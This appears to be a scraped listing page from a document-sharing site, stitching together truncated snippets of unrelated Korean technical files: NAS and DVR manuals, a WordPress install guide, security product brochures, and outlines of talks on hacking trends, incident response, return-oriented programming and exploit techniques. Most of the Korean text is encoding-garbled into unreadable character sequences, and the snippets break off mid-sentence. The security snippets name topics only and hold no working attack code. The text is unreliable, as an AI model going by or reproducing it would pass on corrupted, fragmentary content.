์†Œ๊ฐœ TeraStation ์„ ๊ตฌ์ž…ํ•ด ์ฃผ์…”์„œ ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค! ์ด ์‚ฌ์šฉ ์„ค๋ช…์„œ๋Š” TeraStation ๊ตฌ์„ฑ ์ •๋ณด๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ œํ’ˆ์€ ๊ณ„์† ์—…๋ฐ์ดํŠธ๋˜๋ฏ€๋กœ, ์ด ์„ค๋ช…์„œ์˜ ์ด๋ฏธ์ง€ ๋ฐ ํ…์ŠคํŠธ๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๋ณด์œ  ์ค‘์ธ TeraStation ์— ํ‘œ์‹œ ๋œ ์ด๋ฏธ์ง€ ๋ฐ ํ…์ŠคํŠธ์™€ ์•ฝ๊ฐ„ ๋‹ค๋ฅผ ์ˆ˜

์†Œ๊ฐœ TeraStation ์„ ๊ตฌ์ž…ํ•ด ์ฃผ์…”์„œ ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค! ์ด ์‚ฌ์šฉ ์„ค๋ช…์„œ๋Š” TeraStation ๊ตฌ์„ฑ ์ •๋ณด๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ œํ’ˆ์€ ๊ณ„์† ์—…๋ฐ์ดํŠธ๋˜๋ฏ€๋กœ, ์ด ์„ค๋ช…์„œ์˜ ์ด๋ฏธ์ง€ ๋ฐ ํ…์ŠคํŠธ๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๋ณด์œ  ์ค‘์ธ TeraStation ์— ํ‘œ์‹œ ๋œ ์ด๋ฏธ์ง€ ๋ฐ ํ…์ŠคํŠธ์™€ ์•ฝ๊ฐ„ ๋‹ค๋ฅผ ์ˆ˜ ์‚ฌ์šฉ ์„ค๋ช…์„œ TeraStation Pro II TS-HTGL/R5 ํŒจํ‚ค์ง€ ๋‚ด์šฉ๋ฌผ: ๋ณธ์ฒด (TeraStation) ์ด๋”๋„ท ์ผ€์ด๋ธ” ์ „์› ์ผ€์ด๋ธ” TeraNavigator ์„ค์น˜ CD ์‚ฌ์šฉ ์„ค๋ช…์„œ (์ด ์„ค๋ช…์„œ) ์ œํ’ˆ ๋ณด์ฆ์„œ www.buffalotech.com ์†Œ๊ฐœ TeraStation ์„ ๊ตฌ์ž…ํ•ด ์ฃผ์…”์„œ ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค! ์ด ์‚ฌ์šฉ ์„ค๋ช…์„œ๋Š” TeraStation ๊ตฌ์„ฑ ์ •๋ณด๋ฅผ

More information

SRC PLUS ์ œ์–ด๊ธฐ MANUAL

SRC PLUS ์ œ์–ด๊ธฐ MANUAL ,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO

More information

Codegate์™ธ hacking๋Œ€ํšŒ ์ค‘์—์„œ..

Codegate์™ธ hacking๋Œ€ํšŒ  ์ค‘์—์„œ.. Codegate ์™ธ hacking ๋Œ€ํšŒ์ค‘์—์„œ.. Historymaker ์†Œ๊ฐœ๊ธ€ Codegate ์™ธ hacking ๋Œ€ํšŒ์ค‘ ์ทจ์•ฝ์ ์ผ๋ถ€๋‚ด์šฉ ๋ชฉ์ฐจ 1 4 2012.06.15 20:06 - - =========================================================================================== Thank

More information

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC Step 1~5. Step, PC, DVR Step 1. Cable Step

More information

PCServerMgmt7

PCServerMgmt7 Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network

More information

untitled

untitled Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.

More information

๋ณธ๋ฌธ์„œ๋Š” ์ดˆ๊ธ‰์ž๋“ค์„ ๋Œ€์ƒ์œผ๋กœ ์ตœ๋Œ€ํ•œ ์‰ฝ๊ฒŒ ์ž‘์„ฑํ•˜์˜€์Šต๋‹ˆ๋‹ค. ๋ณธ๋ฌธ์„œ์—์„œ๋Š” ์„ค์น˜๋ฐฉ๋ฒ•๋งŒ ๊ธฐ์ˆ ํ–ˆ์œผ๋ฉฐ ์ž์„ธํ•œ ์„ค์ •๋ฐฉ๋ฒ•์€ ๊ฒ€์ƒ‰์„ ํ†ตํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. 1. ์„ค์น˜๊ฐœ์š” ์›Œ๋“œํ”„๋ ˆ์Šค๋Š” ๋ธ”๋กœ๊ทธ ํ˜•ํƒœ์˜ ํ™ˆํŽ˜์ด์ง€๋ฅผ ๋น ๋ฅด๊ฒŒ ๋งŒ๋“ค์ˆ˜ ์žˆ๊ฒŒ ํ•ด ์ฃผ๋Š” ํ”„๋กœ๊ทธ๋žจ์ž…๋‹ˆ๋‹ค. ๋‹ค์–‘ํ•œ ๊ธฐ๋Šฅ์„ ํ•˜๋Š” ํ”Œ๋Ÿฌ๊ทธ์ธ๊ณผ ๋””์ž์ธ

๋ณธ๋ฌธ์„œ๋Š” ์ดˆ๊ธ‰์ž๋“ค์„ ๋Œ€์ƒ์œผ๋กœ ์ตœ๋Œ€ํ•œ ์‰ฝ๊ฒŒ ์ž‘์„ฑํ•˜์˜€์Šต๋‹ˆ๋‹ค. ๋ณธ๋ฌธ์„œ์—์„œ๋Š” ์„ค์น˜๋ฐฉ๋ฒ•๋งŒ ๊ธฐ์ˆ ํ–ˆ์œผ๋ฉฐ ์ž์„ธํ•œ ์„ค์ •๋ฐฉ๋ฒ•์€ ๊ฒ€์ƒ‰์„ ํ†ตํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. 1. ์„ค์น˜๊ฐœ์š” ์›Œ๋“œํ”„๋ ˆ์Šค๋Š” ๋ธ”๋กœ๊ทธ ํ˜•ํƒœ์˜ ํ™ˆํŽ˜์ด์ง€๋ฅผ ๋น ๋ฅด๊ฒŒ ๋งŒ๋“ค์ˆ˜ ์žˆ๊ฒŒ ํ•ด ์ฃผ๋Š” ํ”„๋กœ๊ทธ๋žจ์ž…๋‹ˆ๋‹ค. ๋‹ค์–‘ํ•œ ๊ธฐ๋Šฅ์„ ํ•˜๋Š” ํ”Œ๋Ÿฌ๊ทธ์ธ๊ณผ ๋””์ž์ธ ์Šค๋งˆ์ผ์„œ๋ธŒ CLOUD_Virtual ์›Œ๋“œํ”„๋ ˆ์Šค ์„ค์น˜ (WORDPRESS INSTALL) ์Šค๋งˆ์ผ์„œ๋ธŒ ๊ฐ€์ƒํ™”์‚ฌ์—…๋ณธ๋ถ€ Update. 2012. 09. 04. ๋ณธ๋ฌธ์„œ๋Š” ์ดˆ๊ธ‰์ž๋“ค์„ ๋Œ€์ƒ์œผ๋กœ ์ตœ๋Œ€ํ•œ ์‰ฝ๊ฒŒ ์ž‘์„ฑํ•˜์˜€์Šต๋‹ˆ๋‹ค. ๋ณธ๋ฌธ์„œ์—์„œ๋Š” ์„ค์น˜๋ฐฉ๋ฒ•๋งŒ ๊ธฐ์ˆ ํ–ˆ์œผ๋ฉฐ ์ž์„ธํ•œ ์„ค์ •๋ฐฉ๋ฒ•์€ ๊ฒ€์ƒ‰์„ ํ†ตํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. 1. ์„ค์น˜๊ฐœ์š” ์›Œ๋“œํ”„๋ ˆ์Šค๋Š” ๋ธ”๋กœ๊ทธ ํ˜•ํƒœ์˜ ํ™ˆํŽ˜์ด์ง€๋ฅผ ๋น ๋ฅด๊ฒŒ ๋งŒ๋“ค์ˆ˜ ์žˆ๊ฒŒ

More information

๋„คํŠธ์›Œํฌ ์•ˆ์ •์„ฑ์„ ์ง€์ผœ์ค„ ์ตœ๊ณ ์˜ ๊ธฐ์ˆ ๊ณผ ์„ฑ๋Šฅ TrusGuard๋Š” ๊ตญ๋‚ด ์ตœ์ดˆ์˜ ํ†ตํ•ฉ๋ณด์•ˆ์†”๋ฃจ์…˜์œผ๋กœ์„œ ์ง€๋‚œ 5๋…„๊ฐ„ ์•ฝ 4์ฒœ์—ฌ ๊ณ ๊ฐ ์‚ฌ์ดํŠธ์— ๊ตฌ์ถ• ์šด์˜๋˜๋ฉด์„œ ๊ธฐ์ˆ ์˜ ์•ˆ์ •์„ฑ๊ณผ ์„ฑ๋Šฅ๋ฉด์—์„œ ์ฒ ์ €ํ•œ ์‹œ์žฅ ๊ฒ€์ฆ์„ ๊ฑฐ์ณค์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ TrusGuard๋Š” ๋‹จ๋… ๊ธฐ๋Šฅ ๋˜๋Š” ๋ณตํ•ฉ ๊ธฐ๋Šฅ ๊ตฌ๋™ ์‹œ

๋„คํŠธ์›Œํฌ ์•ˆ์ •์„ฑ์„ ์ง€์ผœ์ค„ ์ตœ๊ณ ์˜ ๊ธฐ์ˆ ๊ณผ ์„ฑ๋Šฅ TrusGuard๋Š” ๊ตญ๋‚ด ์ตœ์ดˆ์˜ ํ†ตํ•ฉ๋ณด์•ˆ์†”๋ฃจ์…˜์œผ๋กœ์„œ ์ง€๋‚œ 5๋…„๊ฐ„ ์•ฝ 4์ฒœ์—ฌ ๊ณ ๊ฐ ์‚ฌ์ดํŠธ์— ๊ตฌ์ถ• ์šด์˜๋˜๋ฉด์„œ ๊ธฐ์ˆ ์˜ ์•ˆ์ •์„ฑ๊ณผ ์„ฑ๋Šฅ๋ฉด์—์„œ ์ฒ ์ €ํ•œ ์‹œ์žฅ ๊ฒ€์ฆ์„ ๊ฑฐ์ณค์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ TrusGuard๋Š” ๋‹จ๋… ๊ธฐ๋Šฅ ๋˜๋Š” ๋ณตํ•ฉ ๊ธฐ๋Šฅ ๊ตฌ๋™ ์‹œ ๋„คํŠธ์›Œํฌ ๋ณด์•ˆ๋„ ์•ˆ์ฒ ์ˆ˜์—ฐ๊ตฌ์†Œ์ž…๋‹ˆ๋‹ค ํ†ตํ•ฉ ๋ณด์•ˆ์˜ No.1 ํŒŒํŠธ๋„ˆ, AhnLab TrusGuard ๋„คํŠธ์›Œํฌ ํ™˜๊ฒฝ์„ ์ˆ˜ํ˜ธํ•˜๋Š” ์ตœ๊ณ ์˜ ํ†ตํ•ฉ ๋ณด์•ˆ ์‹œ์Šคํ…œ ๊ณ ์„ฑ๋Šฅ ๋ฐฉํ™”๋ฒฝใ†VPN Security ๊ธฐ์ˆ ๊ณผ ๊ณ ํ’ˆ์งˆ Integrated Security ๊ธฐ์ˆ ์˜ ๊ฐ•๋ ฅํ•œ ๊ฒฐํ•ฉ ๋„คํŠธ์›Œํฌ ์•ˆ์ •์„ฑ์„ ์ง€์ผœ์ค„ ์ตœ๊ณ ์˜ ๊ธฐ์ˆ ๊ณผ ์„ฑ๋Šฅ TrusGuard๋Š” ๊ตญ๋‚ด ์ตœ์ดˆ์˜ ํ†ตํ•ฉ๋ณด์•ˆ์†”๋ฃจ์…˜์œผ๋กœ์„œ ์ง€๋‚œ 5๋…„๊ฐ„

More information

์ตœ๊ทผ ํ•ดํ‚นํ˜„ํ™ฉ ๋ฐ ํ•ดํ‚น๊ธฐ์ˆ 

์ตœ๊ทผ ํ•ดํ‚นํ˜„ํ™ฉ ๋ฐ ํ•ดํ‚น๊ธฐ์ˆ  ํ•ดํ‚น๋ฐ๋ฐ”์ด๋Ÿฌ์Šค์˜ˆ๋ฐฉ 2002. 7. 26 ์ •ํ˜„์ฒ  / ํ•œ๊ตญ์ •๋ณด๋ณดํ˜ธ์ง„ํฅ์› hcjung@certcc.or.kr Korea CERT Coordination Center Korea Information Security Agency ๋ชฉ์ฐจ ํ•ดํ‚น๋ฐ”์ด๋Ÿฌ์Šค์˜์ดํ•ด ํ•ดํ‚น๋ฐ”์ด๋Ÿฌ์Šคํ˜„ํ™ฉ๊ณผ์‚ฌ๋ก€ ํ™˜๊ฒฝ๋ณ€ํ™”์™€ํ•ดํ‚น๋ฐ”์ด๋Ÿฌ์Šค๋™ํ–ฅ ๊ณ„์ธต์ ์ธ๋ฐฉ์–ด ์‚ฌ๊ณ ์˜ˆ๋ฐฉ ์ ‘๊ทผํ†ต์ œ ๊ณ„์ • / ํŒจ์Šค์›Œ๋“œ๋ณด์•ˆ ์ตœ์†Œํ•œ์˜์„œ๋น„์Šค์ œ๊ณต

More information

hd1300_k_v1r2_Final_.PDF

hd1300_k_v1r2_Final_.PDF Starter's Kit for HelloDevice 1300 Version 11 1 2 1 2 3 31 32 33 34 35 36 4 41 42 43 5 51 52 6 61 62 Appendix A (cross-over) IP 3 Starter's Kit for HelloDevice 1300 1 HelloDevice 1300 Starter's Kit HelloDevice

More information

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS ( PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step

More information

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration

More information

untitled

untitled CAN BUS RS232 Line Ethernet CAN H/W FIFO RS232 FIFO IP ARP CAN S/W FIFO TERMINAL Emulator COMMAND Interpreter ICMP TCP UDP PROTOCOL Converter TELNET DHCP C2E SW1 CAN RS232 RJ45 Power

More information

๋ฆฌ๋ˆ…์Šค๋ณด์•ˆ๊ด€๋ฆฌ.PDF

๋ฆฌ๋ˆ…์Šค๋ณด์•ˆ๊ด€๋ฆฌ.PDF CMOS Boot loader xlock, vlock Boot loader boot: linux single root /etc/lilo.conf restricted password=pickyourpassword /etc/lilo.conf /sbin/lilo Login timeout ~/.bashrc ~/.bash_profile TMOUT=nn Logout ~/.bash_logout

More information

Interstage5 SOAP์„œ๋น„์Šค ์„ค์ • ๊ฐ€์ด๋“œ

Interstage5 SOAP์„œ๋น„์Šค ์„ค์ • ๊ฐ€์ด๋“œ Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service

More information

Orcad Capture 9.x

Orcad Capture 9.x OrCAD Capture Workbook (Ver 10.xx) 0 Capture 1 2 3 Capture for window 4.opj ( OrCAD Project file) Design file Programe link file..dsn (OrCAD Design file) Design file..olb (OrCAD Library file) file..upd

More information

Sena Technologies, Inc. HelloDevice Super 1.1.0

Sena Technologies, Inc. HelloDevice Super 1.1.0 HelloDevice Super 110 Copyright 1998-2005, All rights reserved HelloDevice 210 ()137-130 Tel: (02) 573-5422 Fax: (02) 573-7710 E-Mail: support@senacom Website: http://wwwsenacom Revision history Revision

More information

01ร€รฅ

01ร€รฅ CHAPTER 01 1 Fedora Fedora Linux Toolbox 2003 Fedora Core( ) http://fedoraproject.org www.redhat.com 2 CHAPTER Fedora RHEL GNU public license www.centos.org www.yellowdoglinux.com www. lineox.net www.

More information

CD-RW_Advanced.PDF

CD-RW_Advanced.PDF HP CD-Writer Program User Guide - - Ver. 2.0 HP CD-RW Adaptec Easy CD Creator Copier, Direct CD. HP CD-RW,. Easy CD Creator 3.5C, Direct CD 3.0., HP. HP CD-RW TEAM ( 02-3270-0803 ) < > 1. CD...3 CD...5

More information

Sun Java System Messaging Server 63 64

Sun Java System Messaging Server 63 64 Sun Java System Messaging Server 6.3 64 Sun Java TM System Communications Suite Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. : 820 2868 2007 7 Copyright 2007 Sun Microsystems,

More information

Chap7.PDF

Chap7.PDF Chapter 7 The SUN Intranet Data Warehouse: Architecture and Tools All rights reserved 1 Intranet Data Warehouse : Distributed Networking Computing Peer-to-peer Peer-to-peer:,. C/S Microsoft ActiveX DCOM(Distributed

More information

Solaris Express Developer Edition

Solaris Express Developer Edition Solaris Express Developer Edition : 2008 1 Solaris TM Express Developer Edition Solaris OS. Sun / Solaris, Java, Web 2.0,,. Developer Solaris Express Developer Edition System Requirements. 768MB. SPARC

More information

๋ชฉ์ฐจ BUG offline replicator ์—์„œ์œ ํšจํ•˜์ง€์•Š์€๋กœ๊ทธ๋ฅผ์ฝ์„๊ฒฝ์šฐ๋น„์ •์ƒ์ข…๋ฃŒํ• ์ˆ˜์žˆ๋‹ค... 3 BUG ๊ฐ partition ์ด์„œ๋กœ๋‹ค๋ฅธ tablespace ๋ฅผ๊ฐ€์ง€๊ณ , column type ์ด CLOB ์ด๋ฉฐ, ํ•ด๋‹น table ์„ truncate

๋ชฉ์ฐจ BUG offline replicator ์—์„œ์œ ํšจํ•˜์ง€์•Š์€๋กœ๊ทธ๋ฅผ์ฝ์„๊ฒฝ์šฐ๋น„์ •์ƒ์ข…๋ฃŒํ• ์ˆ˜์žˆ๋‹ค... 3 BUG ๊ฐ partition ์ด์„œ๋กœ๋‹ค๋ฅธ tablespace ๋ฅผ๊ฐ€์ง€๊ณ , column type ์ด CLOB ์ด๋ฉฐ, ํ•ด๋‹น table ์„ truncate ALTIBASE HDB 6.1.1.5.6 Patch Notes ๋ชฉ์ฐจ BUG-39240 offline replicator ์—์„œ์œ ํšจํ•˜์ง€์•Š์€๋กœ๊ทธ๋ฅผ์ฝ์„๊ฒฝ์šฐ๋น„์ •์ƒ์ข…๋ฃŒํ• ์ˆ˜์žˆ๋‹ค... 3 BUG-41443 ๊ฐ partition ์ด์„œ๋กœ๋‹ค๋ฅธ tablespace ๋ฅผ๊ฐ€์ง€๊ณ , column type ์ด CLOB ์ด๋ฉฐ, ํ•ด๋‹น table ์„ truncate ํ•œ๋’ค, hash partition

More information

MySQL-Ch10

MySQL-Ch10 10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,

More information

hlogin7

hlogin7 0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function

More information

Microsoft PowerPoint - G3-2-๋ฐ•์žฌ์šฐ.pptx

Microsoft PowerPoint - G3-2-๋ฐ•์žฌ์šฐ.pptx International Trends of Hacking Technology (์ตœ์‹  ๊ตญ์ œ ํ•ดํ‚น ๊ธฐ์ˆ  ๋™ํ–ฅ) ETRI ๋ถ€์„ค ์—ฐ๊ตฌ์†Œ Contents 1. Introduction 2. Major Cyber Attacks and Threats in 2013 3. Trends Of Hacking Technology 4. Future 1. Introduction MegaTrend

More information

6๊ฐ•.hwp

6๊ฐ•.hwp ----------------6๊ฐ• ์ •๋ณดํ†ต์‹ ๊ณผ ์ธํ„ฐ๋„ท(1)------------- **์ฃผ์š” ํ‚ค์›Œ๋“œ ** (1) ์ธํ„ฐ๋„ท ์„œ๋น„์Šค (2) ๋„๋ฉ”์ธ๋„ค์ž„, IP ์ฃผ์†Œ (3) ์ธํ„ฐ๋„ท ์ต์Šคํ”Œ๋กœ๋Ÿฌ (4) ์ •๋ณด๊ฒ€์ƒ‰ (5) ์ธํ„ฐ๋„ท ์šฉ์–ด (1) ์ธํ„ฐ๋„ท ์„œ๋น„์Šค******************************* [08/4][08/2] 1. ๋‹ค์Œ ์ค‘ ์ธํ„ฐ๋„ท ์„œ๋น„์Šค์— ๋Œ€ํ•œ ์„ค๋ช…์œผ๋กœ

More information

Sena Device Server Serial/IP TM Version

Sena Device Server Serial/IP TM Version Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: support@sena.com

More information

ร„ยงร‡ร˜ยปรงยฐรญยนรฆรรถยฑรขยผรบยฐยณยนรŸ

ร„ยงร‡ร˜ยปรงยฐรญยนรฆรรถยฑรขยผรบยฐยณยนรŸ 2002. 10. 1 ์ •ํ˜„์ฒ  hcjung@certcc.or.kr ํ•œ๊ตญ์ •๋ณด๋ณดํ˜ธ์ง„ํฅ์›ํ•ดํ‚น๋ฐ”์ด๋Ÿฌ์Šค์ƒ๋‹ด์ง€์›์„ผํ„ฐ ๋ชฉ์ฐจ ์‚ฌ๊ณ ๋Œ€์‘๋‹จ๊ณ„๋ณ„์ฒ˜๋ฆฌ์ ˆ์ฐจ ๋กœ๊ทธ๋ถ„์„ ์‹œ์Šคํ…œํŒŒ์ผ๋ถ„์„ ์นจ์ž…ํ”์ ์ถ”์  & ๋ฐฑ๋„์–ดํƒ์ง€ ์นจํ•ด์‚ฌ๊ณ ๋Œ€์‘๋ฐฉ๋ฒ• PGP ์‚ฌ๊ณ ๋Œ€์‘๋‹จ๊ณ„๋ณ„์ฒ˜๋ฆฌ์ ˆ์ฐจ Emergency Action Plan Phase 1 : Preparation Phase 2 : Identification Phase

More information

ํ•ดํ‚น ๋Œ€์‘ ๊ฒฝ์ง„๋Œ€ํšŒ

ํ•ดํ‚น ๋Œ€์‘ ๊ฒฝ์ง„๋Œ€ํšŒ ์€์ƒ ์ด์ƒ์—ฝ (KT ๋ง๊ด€๋ฆฌ / ์ง€์›๋‹จ๋ณด์•ˆ๊ธฐ์ˆ ๋ถ€ ) ์ •์ฃผํ™˜ (KT ๋ง๊ด€๋ฆฌ / ์ง€์›๋‹จ๋ณด์•ˆ๊ธฐ์ˆ ๋ถ€ ) ๊น€์•„์˜ (KT ๋ง๊ด€๋ฆฌ / ์ง€์›๋‹จ๋ณด์•ˆ๊ธฐ์ˆ ๋ถ€ ) ์ตœ์šฉํ›ˆ (KT ๋ง๊ด€๋ฆฌ / ์ง€์›๋‹จ๋ณด์•ˆ๊ธฐ์ˆ ๋ถ€ ) ์š”์•ฝ๋ณด๊ณ ์„œ ์นจํ•ด์‚ฌ๊ณ ๋ถ„์„ * Unix ์นจํ•ด์‚ฌ๊ณ ๋ถ„์„์€๋กœ๊ทธํŒŒ์ผ๋ถ„์„๊ณผํŒŒ์ผ๋ณ€์กฐ๋ถ„์„์œผ๋กœ๋ถ€ํ„ฐ๋‹จ์„œ๋ฅผ์ฐพ์•„๋‚˜๊ฐ€๋Š”๊ฒƒ์ด์ผ๋ฐ˜์ ์ด๊ธฐ๋•Œ๋ฌธ์—์ผ์ฐจ์ ์œผ๋กœ๋กœ๊ทธํŒŒ์ผ๋ถ„์„์„์‹œ๋„ํ•˜์˜€์œผ๋‚˜, ์›๊ฒฉ๊ณต๊ฒฉ๋กœ๊ทธ๋“ฑ์€ํŠน๋ณ„ํžˆ๋ฐœ๊ฒฌ๋˜์ง€์•Š์•˜์œผ๋ฉฐ์ผ๋ถ€๋ฐฑ๋„์–ด๋‚˜์ˆ˜์ƒํ•œ๋ฉ”์ผ๋กœ๊ทธ๋งŒ์„๋ฐœ๊ฒฌํ•จ.

More information

OPCTalk for Hitachi Ethernet 1 2. Path. DCOMwindow NT/2000 network server. Winsock update win95. . . 3 Excel CSV. Update Background Thread Client Command Queue Size Client Dynamic Scan Block Block

More information

๊ฐ•์˜10

๊ฐ•์˜10 Computer Programming gdb and awk 12 th Lecture ๊น€ํ˜„์ฒ ์ปดํ“จํ„ฐ๊ณตํ•™๋ถ€์„œ์šธ๋Œ€ํ•™๊ต ์ˆœ์„œ C Compiler and Linker ๋ณด์ถฉ Static vs Shared Libraries ( ๊ณ„์† ) gdb awk Q&A Shared vs Static Libraries ( ๊ณ„์† ) Advantage of Using Libraries Reduced

More information

Deok9_Exploit Technique

Deok9_Exploit Technique Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security

More information

hlogin2

hlogin2 0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS

More information

10X56_NWG_KOR.indd

10X56_NWG_KOR.indd ๋””์ง€ํ„ธ ํ”„๋กœ์ ํ„ฐ X56 ๋„คํŠธ์›Œํฌ ๊ฐ€์ด๋“œ ์ด ์ œํ’ˆ์„ ๊ตฌ์ž…ํ•ด ์ฃผ์…”์„œ ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ๋ณธ ์„ค๋ช…์„œ๋Š” ๋„คํŠธ์›Œํฌ ๊ธฐ๋Šฅ ๋งŒ์„ ์„ค๋ช…ํ•˜๊ธฐ ์œ„ํ•œ ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๋ณธ ์ œํ’ˆ์„ ์˜ฌ๋ฐ”๋ฅด๊ฒŒ ์‚ฌ ์šฉํ•˜๋ ค๋ฉด ์ด ์ทจ๊ธ‰์ ˆ๋ช…์ €์™€ ๋ณธ ์ œํ’ˆ์˜ ๋‹ค๋ฅธ ์ทจ๊ธ‰์ ˆ๋ช…์ €๋ฅผ ์ฐธ์กฐํ•˜์‹œ๊ธฐ ๋ฐ”๋ž๋‹ˆ๋‹ค. ์ค‘์š”ํ•œ ์ฃผ์˜์‚ฌํ•ญ ์ด ์ œํ’ˆ์„ ์‚ฌ์šฉํ•˜๊ธฐ ์ „์— ๋จผ์ € ์ด ์ œํ’ˆ์— ๋Œ€ํ•œ ๋ชจ๋“  ์„ค๋ช…์„œ๋ฅผ ์ž˜ ์ฝ์–ด ๋ณด์‹ญ์‹œ์˜ค. ์ฝ์€ ๋’ค์—๋Š” ๋‚˜์ค‘์— ํ•„์š”ํ•  ๋•Œ

More information

vm-์›จ์–ด-01์žฅ

vm-์›จ์–ด-01์žฅ Chapter 16 21 (Agenda). (Green),., 2010. IT IT. IT 2007 3.1% 2030 11.1%, IT 2007 1.1.% 2030 4.7%, 2020 4 IT. 1 IT, IT. (Virtualization),. 2009 /IT 2010 10 2. 6 2008. 1970 MIT IBM (Mainframe), x86 1. (http

More information

ยฐรญยผยฎรร– รƒรขยทร‚

ยฐรญยผยฎรร– รƒรขยทร‚ Performance Optimization of SCTP in Wireless Internet Environments The existing works on Stream Control Transmission Protocol (SCTP) was focused on the fixed network environment. However, the number of

More information

Remote UI Guide

Remote UI Guide Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................

More information

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2

Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2 SDN DDoS (whchoi@cisco.com) Cisco Systems Korea 2008 Cisco Systems, Inc. All rights reserved. 1 Cisco SDN 3.0 DDoS DDoS Cisco DDoS Real Demo 2008 Cisco Systems, Inc. All rights reserved. 2 Cisco SDN 3.0

More information

21 8 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 33 36 37 2 218 Bot 1,45 1,69 12.7% 1,644 1,3 26.5% 666 556 19.8% 25 66 24.2% 423 44 4.7% 323

More information

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper Windows Netra Blade X3-2B( Sun Netra X6270 M3 Blade) : E37790 01 2012 9 Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs,

More information

TTA Verified : HomeGateway :, : (NEtwork Testing Team)

TTA Verified : HomeGateway :, : (NEtwork Testing Team) TTA Verified : HomeGateway :, : (NEtwork Testing Team) : TTA-V-N-05-006-CC11 TTA Verified :2006 6 27 : 01 : 2005 7 18 : 2/15 00 01 2005 7 18 2006 6 27 6 7 9 Ethernet (VLAN, QoS, FTP ) (, ) : TTA-V-N-05-006-CC11

More information

Analyst Briefing

